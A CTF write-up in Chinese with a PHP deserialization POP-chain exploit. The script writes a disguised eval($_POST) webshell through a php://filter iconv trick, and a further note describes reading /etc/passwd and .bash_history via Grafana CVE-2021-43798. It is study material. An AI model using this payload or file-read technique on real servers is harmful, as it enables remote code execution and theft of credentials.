0x01 POP
<?php
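/**
 * Entry class of the challenge's object chain.
 *
 * Security note: PHP calls __wakeup() automatically when an instance is
 * unserialized, and at that point both $hzy and $arr hold whatever the
 * serialized data contained. If that data comes from an untrusted source, the
 * variable-property read in __wakeup() lets the sender pick both the object
 * and the property name that get accessed. Untrusted input should not reach
 * unserialize(); use json_decode(), or restrict classes with the
 * `allowed_classes` option.
 */
class catf1ag1
{
    // Object whose properties are read in __wakeup(); its class is never checked.
    public $hzy;

    // Iterated in __wakeup(); every value is used as a property name on $hzy.
    public $arr;

    /**
     * Prints the syntax-highlighted source of this file.
     *
     * Despite the double underscore this is not a PHP magic method, and
     * nothing in the visible code calls it.
     */
    public function __show()
    {
        show_source(__FILE__);
    }

    /**
     * Runs on unserialize(): dumps each entry of $arr and echoes the property
     * of $hzy that carries that entry's name.
     */
    public function __wakeup()
    {
        foreach ($this->arr as $v) {
            print_r($v);
            var_dump($v);
            // Variable-property read. When $hzy has no accessible property
            // named $v, PHP falls back to $hzy's __get($v), so this line can
            // run code in another class.
            echo $this->hzy->$v;
            echo "</br>hzy是什么鬼???";
        }
    }
}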
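/**
 * Second class of the challenge: a magic getter that can end in a file write.
 *
 * Security note: $file and $txt are plain public properties, so after an
 * unserialize() of untrusted data both the write target and the appended
 * content are chosen by the sender.
 */
class catf1ag2
{
    // Destination handed to file_put_contents() in pputut().
    public $file;

    // Text appended after the fixed prefix in pputut().
    public $txt;

    /**
     * Magic getter, invoked for any property that is not accessible.
     *
     * @param string $key Name of the property that was read.
     * @return string Result of pputut() for the name 'pputut', otherwise the
     *                HTML-escaped name wrapped in a <p> element.
     */
    public function __get($key)
    {
        if ($key === 'pputut') {
            return $this->pputut();
        }

        return '<p>' . htmlspecialchars($key) . '</p>';
    }

    /**
     * Writes the fixed prefix followed by $txt to $file.
     *
     * The only validation is a substring check for "../" and a backslash.
     * That check does not restrict scheme-prefixed targets, so stream
     * wrappers such as php:// still reach file_put_contents(). The prepended
     * die() stub only protects the written file if the bytes reach disk
     * unmodified, which a write filter does not guarantee. A safer design
     * writes to a server-chosen name inside a fixed directory and rejects
     * any target containing a scheme.
     *
     * @return string The HTML-escaped content that was written.
     */
    public function pputut()
    {
        if (strpos($this->file, '../') !== false || strpos($this->file, '\\') !== false) {
            die();
        }

        $content = "<?php die('stupid')? >";
        echo "NICE";
        $content .= $this->txt;
        var_dump($this->file);
        file_put_contents($this->file, $content);

        return htmlspecialchars($content);
    }
}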
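一开始,反序列化时会自动触发catf1ag1的 __wakeup(),其中的 $this->hzy->$v;
访问了catf1ag2中不存在的属性,从而调用catf1ag2的 __get($key)
并且当 $v 为 'pputut'(即满足 key=='pputut')时,__get 会转去执行 pputut() 写文件。
根本问题在于对不可信数据做反序列化,而且路径检查只过滤了 '../' 和 '\\',没有限制 php:// 这类流包装器。
过程没有搞得太清楚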
<?php
/**
 * Local stand-in for the target's catf1ag1, used only to produce serialized data.
 *
 * Serialized PHP objects carry the class name and property values but no
 * methods, so this stub needs only the same name and public properties as the
 * class on the receiving side.
 */
class catf1ag1
{
    public $hzy;
    public $arr;

    /**
     * Fills $hzy with a catf1ag2 instance and $arr with the single name 'pputut'.
     */
    public function __construct()
    {
        $this->hzy = new catf1ag2();
        $this->arr = ['pputut'];
    }
}
/**
 * Local stand-in for the target's catf1ag2, used only to produce serialized data.
 *
 * Only the property values set in the constructor end up in the serialized
 * form. pputut() is not defined in this stub, so reading the 'pputut'
 * property here would fail.
 */
class catf1ag2
{
    public $file;
    public $txt;

    /**
     * Sets $file to a php://filter write target (iconv UCS-2LE to UCS-2BE,
     * resource 1.php) and $txt to the text that the target appends.
     */
    public function __construct()
    {
        $this->file = 'php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=1.php';
        $this->txt = 'aaa?<hp pvela$(P_SO[T]1;)>?';
    }

    /**
     * Same getter as the challenge class: dispatches 'pputut' to pputut() and
     * returns any other name HTML-escaped inside a <p> element.
     */
    public function __get($key)
    {
        return $key == 'pputut'
            ? $this->pputut()
            : '<p>' . htmlspecialchars($key) . '</p>';
    }
}
// Build the object graph, serialize it and print the result base64-encoded.
$chain = new catf1ag1();
$serialized = serialize($chain);
echo base64_encode($serialized);
?>
0x02 history
[!info]
Grafana 任意文件读取漏洞(CVE-2021-43798)
首先读取 /etc/passwd,发现存在 grafana 用户,接着尝试读取 .bash_history
得到 flag